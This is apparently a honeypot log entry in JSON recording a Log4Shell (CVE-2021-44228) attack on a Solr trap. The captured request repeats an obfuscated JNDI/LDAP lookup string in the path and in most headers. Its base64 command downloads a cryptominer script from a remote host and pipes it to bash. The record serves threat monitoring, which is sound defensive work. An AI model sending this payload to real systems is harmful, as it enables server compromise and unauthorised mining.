Created
December 22, 2025 12:56
cve-2021-44228-20251122-133313-960053.json
| { | |
| "version": "1.0", | |
| "metadata": { | |
| "timestamp": "2025-11-22T13:33:13.960053Z", | |
| "cve": "CVE-2021-44228", | |
| "client_ip": "172.20.0.3", | |
| "honeypot": "solr-log4shell", | |
| "context": "header:X-Originating-Ip" | |
| }, | |
| "request": { | |
| "method": "GET", | |
| "path": "/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "protocol": "HTTP/1.0", | |
| "headers": { | |
| "Host": "152.228.218.63", | |
| "X-Real-Ip": "149.86.227.16", | |
| "Connection": "close", | |
| "User-Agent": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Accept": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Authentication": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Authorization": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Bearer": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Cookie": "JSESSIONID=t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Originating-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "Referer": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Api-Version": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Client-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Druid-Comment": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Originating-Ip": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')", | |
| "X-Requested-With": "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//151.242.69.104:3306/TomcatBypass/Command/Base64/cGtpbGwgLWYgL3RtcC93YXRjaGVyOyBleHBvcnQgSE9NRT0vdG1wOyBjdXJsIC1zIC1MIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS41Ni4yNy45Ny9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" | |
| } | |
| }, | |
| "body": { | |
| "raw": "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", | |
| "checksum": { | |
| "algorithm": "sha256", | |
| "value": "4d11d8cd39bfc0f83358f9b169a0ed591d68d02137d06d74c29df5831ba56e08" | |
| }, | |
| "size": 546 | |
| }, | |
| "analysis": { | |
| "extracted_payloads": [ | |
| "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:", | |
| "j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:", | |
| "l}dap" | |
| ], | |
| "attack_type": "log4shell_jndi", | |
| "confidence": "high" | |
| } | |
| } |